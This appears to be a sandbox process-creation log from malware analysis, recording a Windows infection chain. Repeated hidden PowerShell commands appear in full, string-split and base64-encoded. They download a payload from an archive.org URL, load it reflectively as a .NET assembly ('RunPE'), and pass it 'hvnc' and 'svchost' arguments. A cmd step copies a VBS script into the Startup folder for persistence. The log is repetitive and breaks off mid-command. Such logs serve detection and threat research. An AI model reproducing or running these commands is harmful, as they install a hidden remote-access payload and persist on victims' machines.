Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('NrXurl'+' ='+' Z'+'Ho'+'ht'+'tps://'+'ia600'+'10'+'0.us.arch'+'iv'+'e.'+'org/24/'+'it'+'ems/deta'+'h-n'+'ote-v/D'+'e'+'tahNoteV'+'.tx'+'tZHo;NrX'+'ba'+'se64Conten'+'t = (New-Object System.'+'Net.WebC'+'lie'+'nt).Download'+'String(NrXurl'+');Nr'+'X'+'bi'+'n'+'ar'+'yConten'+'t ='+' [System.Convert]::FromBase'+'64S'+'tr'+'in'+'g(NrXbas'+'e64C'+'on'+'ten'+'t);NrXassembly = '+'[Reflec'+'tion.'+'A'+'ssembly]:'+':L'+'oad('+'Nr'+'Xbinar'+'yC'+'ont'+'ent)'+';'+'NrX'+'typ'+'e'+' ='+' NrXassembl'+'y.GetType(ZHo'+'RunPE.HomeZHo);NrX'+'m'+'ethod = '+'N'+'rXt'+'ype.G'+'etM'+'ethod'+'(ZH'+'oVAIZHo);N'+'r'+'Xmeth'+'od.'+'In'+'voke(Nr'+'Xn'+'u'+'ll, [object[]]@(ZHo0/E7O'+'28/d/ee.'+'etsap//:sptthZH'+'o ,'+' '+'ZHo1ZHo'+' , ZHoC:OwGPro'+'gramDa'+'ta'+'O'+'wGZH'+'o , ZHohvncZ'+'Ho,'+'Z'+'Hosv'+'chostZHo,ZHoZHo)'+')') -crepLace ([chAR]90+[chAR]72+[chAR]111),[chAR]39-rePlACe'OwG',[chAR]92-rePlACe ([chAR]78+[chAR]114+[chAR]88),[chAR]36)|invOKe-exPReSSiON"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\Public\Documents\pow\wm.vbs"
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [System.IO.File]::Copy('C:\Users\Public\Documents\pow\wm.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.navircse.vbs')')
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnezB9dXJsID0gezF9aHR0cHMnKyc6Ly9pYTYwJysnMDEwMC51cy5hcmNoaScrJ3ZlLm9yZycrJy8yNC9pJysndGVtcycrJy9kJysnZXQnKydhJysnaC1ub3RlLXYvRGV0YWgnKydOb3RlVicrJy50eHR7MX07ezAnKyd9YmFzZTY0Q28nKydudGVudCAnKyc9JysnICcrJyhOZXctT2InKydqZWN0IFN5Jysnc3QnKydlbS5OZScrJ3QuVycrJ2ViQ2xpZScrJ250KS4nKydEb3dubCcrJ29hZFN0JysncmluJysnZyh7MCcrJ30nKyd1cmwpO3snKycwfWJpbicrJ2FyJysneUNvbicrJ3RlbicrJ3QgPScrJyAnKydbU3lzdGVtLkNvbnZlcnRdJysnOjonKydGcm9tQmEnKydzZTY0U3RyaW5nKHswfWJhc2UnKyc2NENvbicrJ3RlbnQpO3swfWFzc2UnKydtYmwnKyd5ICcrJz0nKycgW1JlZmxlY3Rpb24uQXMnKydzJysnZW1ibHldOjonKydMbycrJ2FkKHswfWJpbmEnKydyeUNvbnRlbnQpO3swfXR5cCcrJ2UgJysnPSB7JysnMH0nKydhc3NlbScrJ2JseS5HZXRUJysneXAnKydlKHsxfVInKyd1blBFJysnLkhvJysnbWV7JysnMX0pO3swJysnfScrJ21lJysndGhvZCA9IHswfXR5cGUuR2V0TWV0aG9kKHsxfVZBJysnSXsxfScrJyk7ezB9JysnbScrJ2UnKyd0aCcrJ29kLkluJysndicrJ29rZSh7MH1udScrJ2xsLCBbb2JqZScrJ2N0WycrJ11dJysnQCh7MX0nKycwJysnL2dKMWsnKydTJysnL2QvJysnZWUuZScrJ3RzYXAvLzpzcHR0aHsxJysnfScrJyAsJysnIHsxfWRlJysnc2F0JysnaXZhZG97MScrJ30nKycgLCB7MScrJ31kZXNhdGl2YScrJ2QnKydvezF9ICwgezF9JysnZGUnKydzYXRpdmFkb3snKycxfSx7MX1DJysnYScrJ3NQbycrJ2x7MX0nKycsezEnKyd9eycrJzF9KSknKS1mICBbY2hBUl0zNixbY2hBUl0zOSkgfElleA==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\PING.EXE ping 127.0.0.1 -n 10
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command [System.IO.File]::Copy('C:\Users\Public\Documents\pow\wm.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.navircse.vbs')')
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\Public\Documents\pow\wm.vbs"
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [System.IO.File]::Copy('C:\Users\Public\Documents\pow\wm.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.navircse.vbs')')
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnezB9dXJsID0gezF9aHR0cHMnKyc6Ly9pYTYwJysnMDEwMC51cy5hcmNoaScrJ3ZlLm9yZycrJy8yNC9pJysndGVtcycrJy9kJysnZXQnKydhJysnaC1ub3RlLXYvRGV0YWgnKydOb3RlVicrJy50eHR7MX07ezAnKyd9YmFzZTY0Q28nKydudGVudCAnKyc9JysnICcrJyhOZXctT2InKydqZWN0IFN5Jysnc3QnKydlbS5OZScrJ3QuVycrJ2ViQ2xpZScrJ250KS4nKydEb3dubCcrJ29hZFN0JysncmluJysnZyh7MCcrJ30nKyd1cmwpO3snKycwfWJpbicrJ2FyJysneUNvbicrJ3RlbicrJ3QgPScrJyAnKydbU3lzdGVtLkNvbnZlcnRdJysnOjonKydGcm9tQmEnKydzZTY0U3RyaW5nKHswfWJhc2UnKyc2NENvbicrJ3RlbnQpO3swfWFzc2UnKydtYmwnKyd5ICcrJz0nKycgW1JlZmxlY3Rpb24uQXMnKydzJysnZW1ibHldOjonKydMbycrJ2FkKHswfWJpbmEnKydyeUNvbnRlbnQpO3swfXR5cCcrJ2UgJysnPSB7JysnMH0nKydhc3NlbScrJ2JseS5HZXRUJysneXAnKydlKHsxfVInKyd1blBFJysnLkhvJysnbWV7JysnMX0pO3swJysnfScrJ21lJysndGhvZCA9IHswfXR5cGUuR2V0TWV0aG9kKHsxfVZBJysnSXsxfScrJyk7ezB9JysnbScrJ2UnKyd0aCcrJ29kLkluJysndicrJ29rZSh7MH1udScrJ2xsLCBbb2JqZScrJ2N0WycrJ11dJysnQCh7MX0nKycwJysnL2dKMWsnKydTJysnL2QvJysnZWUuZScrJ3RzYXAvLzpzcHR0aHsxJysnfScrJyAsJysnIHsxfWRlJysnc2F0JysnaXZhZG97MScrJ30nKycgLCB7MScrJ31kZXNhdGl2YScrJ2QnKydvezF9ICwgezF9JysnZGUnKydzYXRpdmFkb3snKycxfSx7MX1DJysnYScrJ3NQbycrJ2x7MX0nKycsezEnKyd9eycrJzF9KSknKS1mICBbY2hBUl0zNixbY2hBUl0zOSkgfElleA==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\PING.EXE ping 127.0.0.1 -n 10
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command [System.IO.File]::Copy('C:\Users\Public\Documents\pow\wm.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.navircse.vbs')')
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\Public\Documents\pow\wm.vbs"
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [System.IO.File]::Copy('C:\Users\Public\Documents\pow\wm.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.navircse.vbs')')
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnezB9dXJsID0gezF9aHR0cHMnKyc6Ly9pYTYwJysnMDEwMC51cy5hcmNoaScrJ3ZlLm9yZycrJy8yNC9pJysndGVtcycrJy9kJysnZXQnKydhJysnaC1ub3RlLXYvRGV0YWgnKydOb3RlVicrJy50eHR7MX07ezAnKyd9YmFzZTY0Q28nKydudGVudCAnKyc9JysnICcrJyhOZXctT2InKydqZWN0IFN5Jysnc3QnKydlbS5OZScrJ3QuVycrJ2ViQ2xpZScrJ250KS4nKydEb3dubCcrJ29hZFN0JysncmluJysnZyh7MCcrJ30nKyd1cmwpO3snKycwfWJpbicrJ2FyJysneUNvbicrJ3RlbicrJ3QgPScrJyAnKydbU3lzdGVtLkNvbnZlcnRdJysnOjonKydGcm9tQmEnKydzZTY0U3RyaW5nKHswfWJhc2UnKyc2NENvbicrJ3RlbnQpO3swfWFzc2UnKydtYmwnKyd5ICcrJz0nKycgW1JlZmxlY3Rpb24uQXMnKydzJysnZW1ibHldOjonKydMbycrJ2FkKHswfWJpbmEnKydyeUNvbnRlbnQpO3swfXR5cCcrJ2UgJysnPSB7JysnMH0nKydhc3NlbScrJ2JseS5HZXRUJysneXAnKydlKHsxfVInKyd1blBFJysnLkhvJysnbWV7JysnMX0pO3swJysnfScrJ21lJysndGhvZCA9IHswfXR5cGUuR2V0TWV0aG9kKHsxfVZBJysnSXsxfScrJyk7ezB9JysnbScrJ2UnKyd0aCcrJ29kLkluJysndicrJ29rZSh7MH1udScrJ2xsLCBbb2JqZScrJ2N0WycrJ11dJysnQCh7MX0nKycwJysnL2dKMWsnKydTJysnL2QvJysnZWUuZScrJ3RzYXAvLzpzcHR0aHsxJysnfScrJyAsJysnIHsxfWRlJysnc2F0JysnaXZhZG97MScrJ30nKycgLCB7MScrJ31kZXNhdGl2YScrJ2QnKydvezF9ICwgezF9JysnZGUnKydzYXRpdmFkb3snKycxfSx7MX1DJysnYScrJ3NQbycrJ2x7MX0nKycsezEnKyd9eycrJzF9KSknKS1mICBbY2hBUl0zNixbY2hBUl0zOSkgfElleA==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\PING.EXE ping 127.0.0.1 -n 10
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command [System.IO.File]::Copy('C:\Users\Public\Documents\pow\wm.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.navircse.vbs')')
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\Public\Documents\32\hnvc.vbs"
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnTnJYdXJsJysnID0nKycgWicrJ0hvJysnaHQnKyd0cHM6Ly8nKydpYTYwMCcrJzEwJysnMC51cy5hcmNoJysnaXYnKydlLicrJ29yZy8yNC8nKydpdCcrJ2Vtcy9kZXRhJysnaC1uJysnb3RlLXYvRCcrJ2UnKyd0YWhOb3RlVicrJy50eCcrJ3RaSG87TnJYJysnYmEnKydzZTY0Q29udGVuJysndCA9IChOZXctT2JqZWN0IFN5c3RlbS4nKydOZXQuV2ViQycrJ2xpZScrJ250KS5Eb3dubG9hZCcrJ1N0cmluZyhOclh1cmwnKycpO05yJysnWCcrJ2JpJysnbicrJ2FyJysneUNvbnRlbicrJ3QgPScrJyBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZScrJzY0UycrJ3RyJysnaW4nKydnKE5yWGJhcycrJ2U2NEMnKydvbicrJ3RlbicrJ3QpO05yWGFzc2VtYmx5ID0gJysnW1JlZmxlYycrJ3Rpb24uJysnQScrJ3NzZW1ibHldOicrJzpMJysnb2FkKCcrJ05yJysnWGJpbmFyJysneUMnKydvbnQnKydlbnQpJysnOycrJ05yWCcrJ3R5cCcrJ2UnKycgPScrJyBOclhhc3NlbWJsJysneS5HZXRUeXBlKFpIbycrJ1J1blBFLkhvbWVaSG8pO05yWCcrJ20nKydldGhvZCA9ICcrJ04nKydyWHQnKyd5cGUuRycrJ2V0TScrJ2V0aG9kJysnKFpIJysnb1ZBSVpIbyk7TicrJ3InKydYbWV0aCcrJ29kLicrJ0luJysndm9rZShOcicrJ1huJysndScrJ2xsLCBbb2JqZWN0W11dQChaSG8wL0U3TycrJzI4L2QvZWUuJysnZXRzYXAvLzpzcHR0aFpIJysnbyAsJysnICcrJ1pIbzFaSG8nKycgLCBaSG9DOk93R1BybycrJ2dyYW1EYScrJ3RhJysnTycrJ3dHWkgnKydvICwgWkhvaHZuY1onKydIbywnKydaJysnSG9zdicrJ2Nob3N0WkhvLFpIb1pIbyknKycpJykgLWNyZXBMYWNlICAoW2NoQVJdOTArW2NoQVJdNzIrW2NoQVJdMTExKSxbY2hBUl0zOS1yZVBsQUNlJ093RycsW2NoQVJdOTItcmVQbEFDZSAoW2NoQVJdNzgrW2NoQVJdMTE0K1tjaEFSXTg4KSxbY2hBUl0zNil8aW52T0tlLWV4UFJlU1NpT04=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('NrXurl'+' ='+' Z'+'Ho'+'ht'+'tps://'+'ia600'+'10'+'0.us.arch'+'iv'+'e.'+'org/24/'+'it'+'ems/deta'+'h-n'+'ote-v/D'+'e'+'tahNoteV'+'.tx'+'tZHo;NrX'+'ba'+'se64Conten'+'t = (New-Object System.'+'Net.WebC'+'lie'+'nt).Download'+'String(NrXurl'+');Nr'+'X'+'bi'+'n'+'ar'+'yConten'+'t ='+' [System.Convert]::FromBase'+'64S'+'tr'+'in'+'g(NrXbas'+'e64C'+'on'+'ten'+'t);NrXassembly = '+'[Reflec'+'tion.'+'A'+'ssembly]:'+':L'+'oad('+'Nr'+'Xbinar'+'yC'+'ont'+'ent)'+';'+'NrX'+'typ'+'e'+' ='+' NrXassembl'+'y.GetType(ZHo'+'RunPE.HomeZHo);NrX'+'m'+'ethod = '+'N'+'rXt'+'ype.G'+'etM'+'ethod'+'(ZH'+'oVAIZHo);N'+'r'+'Xmeth'+'od.'+'In'+'voke(Nr'+'Xn'+'u'+'ll, [object[]]@(ZHo0/E7O'+'28/d/ee.'+'etsap//:sptthZH'+'o ,'+' '+'ZHo1ZHo'+' , ZHoC:OwGPro'+'gramDa'+'ta'+'O'+'wGZH'+'o , ZHohvncZ'+'Ho,'+'Z'+'Hosv'+'chostZHo,ZHoZHo)'+')') -crepLace ([chAR]90+[chAR]72+[chAR]111),[chAR]39-rePlACe'OwG',[chAR]92-rePlACe ([chAR]78+[chAR]114+[chAR]88),[chAR]36)|invOKe-exPReSSiON"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\Public\Documents\32\hnvc.vbs"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\Public\Documents\sys\hnvc.vbs"
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnTnJYdXJsJysnID0nKycgWicrJ0hvJysnaHQnKyd0cHM6Ly8nKydpYTYwMCcrJzEwJysnMC51cy5hcmNoJysnaXYnKydlLicrJ29yZy8yNC8nKydpdCcrJ2Vtcy9kZXRhJysnaC1uJysnb3RlLXYvRCcrJ2UnKyd0YWhOb3RlVicrJy50eCcrJ3RaSG87TnJYJysnYmEnKydzZTY0Q29udGVuJysndCA9IChOZXctT2JqZWN0IFN5c3RlbS4nKydOZXQuV2ViQycrJ2xpZScrJ250KS5Eb3dubG9hZCcrJ1N0cmluZyhOclh1cmwnKycpO05yJysnWCcrJ2JpJysnbicrJ2FyJysneUNvbnRlbicrJ3QgPScrJyBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZScrJzY0UycrJ3RyJysnaW4nKydnKE5yWGJhcycrJ2U2NEMnKydvbicrJ3RlbicrJ3QpO05yWGFzc2VtYmx5ID0gJysnW1JlZmxlYycrJ3Rpb24uJysnQScrJ3NzZW1ibHldOicrJzpMJysnb2FkKCcrJ05yJysnWGJpbmFyJysneUMnKydvbnQnKydlbnQpJysnOycrJ05yWCcrJ3R5cCcrJ2UnKycgPScrJyBOclhhc3NlbWJsJysneS5HZXRUeXBlKFpIbycrJ1J1blBFLkhvbWVaSG8pO05yWCcrJ20nKydldGhvZCA9ICcrJ04nKydyWHQnKyd5cGUuRycrJ2V0TScrJ2V0aG9kJysnKFpIJysnb1ZBSVpIbyk7TicrJ3InKydYbWV0aCcrJ29kLicrJ0luJysndm9rZShOcicrJ1huJysndScrJ2xsLCBbb2JqZWN0W11dQChaSG8wL0U3TycrJzI4L2QvZWUuJysnZXRzYXAvLzpzcHR0aFpIJysnbyAsJysnICcrJ1pIbzFaSG8nKycgLCBaSG9DOk93R1BybycrJ2dyYW1EYScrJ3RhJysnTycrJ3dHWkgnKydvICwgWkhvaHZuY1onKydIbywnKydaJysnSG9zdicrJ2Nob3N0WkhvLFpIb1pIbyknKycpJykgLWNyZXBMYWNlICAoW2NoQVJdOTArW2NoQVJdNzIrW2NoQVJdMTExKSxbY2hBUl0zOS1yZVBsQUNlJ093RycsW2NoQVJdOTItcmVQbEFDZSAoW2NoQVJdNzgrW2NoQVJdMTE0K1tjaEFSXTg4KSxbY2hBUl0zNil8aW52T0tlLWV4UFJlU1NpT04=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnTnJYdXJsJysnID0nKycgWicrJ0hvJysnaHQnKyd0cHM6Ly8nKydpYTYwMCcrJzEwJysnMC51cy5hcmNoJysnaXYnKydlLicrJ29yZy8yNC8nKydpdCcrJ2Vtcy9kZXRhJysnaC1uJysnb3RlLXYvRCcrJ2UnKyd0YWhOb3RlVicrJy50eCcrJ3RaSG87TnJYJysnYmEnKydzZTY0Q29udGVuJysndCA9IChOZXctT2JqZWN0IFN5c3RlbS4nKydOZXQuV2ViQycrJ2xpZScrJ250KS5Eb3dubG9hZCcrJ1N0cmluZyhOclh1cmwnKycpO05yJysnWCcrJ2JpJysnbicrJ2FyJysneUNvbnRlbicrJ3QgPScrJyBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZScrJzY0UycrJ3RyJysnaW4nKydnKE5yWGJhcycrJ2U2NEMnKydvbicrJ3RlbicrJ3QpO05yWGFzc2VtYmx5ID0gJysnW1JlZmxlYycrJ3Rpb24uJysnQScrJ3NzZW1ibHldOicrJzpMJysnb2FkKCcrJ05yJysnWGJpbmFyJysneUMnKydvbnQnKydlbnQpJysnOycrJ05yWCcrJ3R5cCcrJ2UnKycgPScrJyBOclhhc3NlbWJsJysneS5HZXRUeXBlKFpIbycrJ1J1blBFLkhvbWVaSG8pO05yWCcrJ20nKydldGhvZCA9ICcrJ04nKydyWHQnKyd5cGUuRycrJ2V0TScrJ2V0aG9kJysnKFpIJysnb1ZBSVpIbyk7TicrJ3InKydYbWV0aCcrJ29kLicrJ0luJysndm9rZShOcicrJ1huJysndScrJ2xsLCBbb2JqZWN0W11dQChaSG8wL0U3TycrJzI4L2QvZWUuJysnZXRzYXAvLzpzcHR0aFpIJysnbyAsJysnICcrJ1pIbzFaSG8nKycgLCBaSG9DOk93R1BybycrJ2dyYW1EYScrJ3RhJysnTycrJ3dHWkgnKydvICwgWkhvaHZuY1onKydIbywnKydaJysnSG9zdicrJ2Nob3N0WkhvLFpIb1pIbyknKycpJykgLWNyZXBMYWNlICAoW2NoQVJdOTArW2NoQVJdNzIrW2NoQVJdMTExKSxbY2hBUl0zOS1yZVBsQUNlJ093RycsW2NoQVJdOTItcmVQbEFDZSAoW2NoQVJdNzgrW2NoQVJdMTE0K1tjaEFSXTg4KSxbY2hBUl0zNil8aW52T0tlLWV4UFJlU1NpT04=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\Public\Documents\32\hnvc.vbs"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('NrXurl'+' ='+' Z'+'Ho'+'ht'+'tps://'+'ia600'+'10'+'0.us.arch'+'iv'+'e.'+'org/24/'+'it'+'ems/deta'+'h-n'+'ote-v/D'+'e'+'tahNoteV'+'.tx'+'tZHo;NrX'+'ba'+'se64Conten'+'t = (New-Object System.'+'Net.WebC'+'lie'+'nt).Download'+'String(NrXurl'+');Nr'+'X'+'bi'+'n'+'ar'+'yConten'+'t ='+' [System.Convert]::FromBase'+'64S'+'tr'+'in'+'g(NrXbas'+'e64C'+'on'+'ten'+'t);NrXassembly = '+'[Reflec'+'tion.'+'A'+'ssembly]:'+':L'+'oad('+'Nr'+'Xbinar'+'yC'+'ont'+'ent)'+';'+'NrX'+'typ'+'e'+' ='+' NrXassembl'+'y.GetType(ZHo'+'RunPE.HomeZHo);NrX'+'m'+'ethod = '+'N'+'rXt'+'ype.G'+'etM'+'ethod'+'(ZH'+'oVAIZHo);N'+'r'+'Xmeth'+'od.'+'In'+'voke(Nr'+'Xn'+'u'+'ll, [object[]]@(ZHo0/E7O'+'28/d/ee.'+'etsap//:sptthZH'+'o ,'+' '+'ZHo1ZHo'+' , ZHoC:OwGPro'+'gramDa'+'ta'+'O'+'wGZH'+'o , ZHohvncZ'+'Ho,'+'Z'+'Hosv'+'chostZHo,ZHoZHo)'+')') -crepLace ([chAR]90+[chAR]72+[chAR]111),[chAR]39-rePlACe'OwG',[chAR]92-rePlACe ([chAR]78+[chAR]114+[chAR]88),[chAR]36)|invOKe-exPReSSiON"
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnTnJYdXJsJysnID0nKycgWicrJ0hvJysnaHQnKyd0cHM6Ly8nKydpYTYwMCcrJzEwJysnMC51cy5hcmNoJysnaXYnKydlLicrJ29yZy8yNC8nKydpdCcrJ2Vtcy9kZXRhJysnaC1uJysnb3RlLXYvRCcrJ2UnKyd0YWhOb3RlVicrJy50eCcrJ3RaSG87TnJYJysnYmEnKydzZTY0Q29udGVuJysndCA9IChOZXctT2JqZWN0IFN5c3RlbS4nKydOZXQuV2ViQycrJ2xpZScrJ250KS5Eb3dubG9hZCcrJ1N0cmluZyhOclh1cmwnKycpO05yJysnWCcrJ2JpJysnbicrJ2FyJysneUNvbnRlbicrJ3QgPScrJyBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZScrJzY0UycrJ3RyJysnaW4nKydnKE5yWGJhcycrJ2U2NEMnKydvbicrJ3RlbicrJ3QpO05yWGFzc2VtYmx5ID0gJysnW1JlZmxlYycrJ3Rpb24uJysnQScrJ3NzZW1ibHldOicrJzpMJysnb2FkKCcrJ05yJysnWGJpbmFyJysneUMnKydvbnQnKydlbnQpJysnOycrJ05yWCcrJ3R5cCcrJ2UnKycgPScrJyBOclhhc3NlbWJsJysneS5HZXRUeXBlKFpIbycrJ1J1blBFLkhvbWVaSG8pO05yWCcrJ20nKydldGhvZCA9ICcrJ04nKydyWHQnKyd5cGUuRycrJ2V0TScrJ2V0aG9kJysnKFpIJysnb1ZBSVpIbyk7TicrJ3InKydYbWV0aCcrJ29kLicrJ0luJysndm9rZShOcicrJ1huJysndScrJ2xsLCBbb2JqZWN0W11dQChaSG8wL0U3TycrJzI4L2QvZWUuJysnZXRzYXAvLzpzcHR0aFpIJysnbyAsJysnICcrJ1pIbzFaSG8nKycgLCBaSG9DOk93R1BybycrJ2dyYW1EYScrJ3RhJysnTycrJ3dHWkgnKydvICwgWkhvaHZuY1onKydIbywnKydaJysnSG9zdicrJ2Nob3N0WkhvLFpIb1pIbyknKycpJykgLWNyZXBMYWNlICAoW2NoQVJdOTArW2NoQVJdNzIrW2NoQVJdMTExKSxbY2hBUl0zOS1yZVBsQUNlJ093RycsW2NoQVJdOTItcmVQbEFDZSAoW2NoQVJdNzgrW2NoQVJdMTE0K1tjaEFSXTg4KSxbY2hBUl0zNil8aW52T0tlLWV4UFJlU1NpT04=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('NrXurl'+' ='+' Z'+'Ho'+'ht'+'tps://'+'ia600'+'10'+'0.us.arch'+'iv'+'e.'+'org/24/'+'it'+'ems/deta'+'h-n'+'ote-v/D'+'e'+'tahNoteV'+'.tx'+'tZHo;NrX'+'ba'+'se64Conten'+'t = (New-Object System.'+'Net.WebC'+'lie'+'nt).Download'+'String(NrXurl'+');Nr'+'X'+'bi'+'n'+'ar'+'yConten'+'t ='+' [System.Convert]::FromBase'+'64S'+'tr'+'in'+'g(NrXbas'+'e64C'+'on'+'ten'+'t);NrXassembly = '+'[Reflec'+'tion.'+'A'+'ssembly]:'+':L'+'oad('+'Nr'+'Xbinar'+'yC'+'ont'+'ent)'+';'+'NrX'+'typ'+'e'+' ='+' NrXassembl'+'y.GetType(ZHo'+'RunPE.HomeZHo);NrX'+'m'+'ethod = '+'N'+'rXt'+'ype.G'+'etM'+'ethod'+'(ZH'+'oVAIZHo);N'+'r'+'Xmeth'+'od.'+'In'+'voke(Nr'+'Xn'+'u'+'ll, [object[]]@(ZHo0/E7O'+'28/d/ee.'+'etsap//:sptthZH'+'o ,'+' '+'ZHo1ZHo'+' , ZHoC:OwGPro'+'gramDa'+'ta'+'O'+'wGZH'+'o , ZHohvncZ'+'Ho,'+'Z'+'Hosv'+'chostZHo,ZHoZHo)'+')') -crepLace ([chAR]90+[chAR]72+[chAR]111),[chAR]39-rePlACe'OwG',[chAR]92-rePlACe ([chAR]78+[chAR]114+[chAR]88),[chAR]36)|invOKe-exPReSSiON"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('NrXurl'+' ='+' Z'+'Ho'+'ht'+'tps://'+'ia600'+'10'+'0.us.arch'+'iv'+'e.'+'org/24/'+'it'+'ems/deta'+'h-n'+'ote-v/D'+'e'+'tahNoteV'+'.tx'+'tZHo;NrX'+'ba'+'se64Conten'+'t = (New-Object System.'+'Net.WebC'+'lie'+'nt).Download'+'String(NrXurl'+');Nr'+'X'+'bi'+'n'+'ar'+'yConten'+'t ='+' [System.Convert]::FromBase'+'64S'+'tr'+'in'+'g(NrXbas'+'e64C'+'on'+'ten'+'t);NrXassembly = 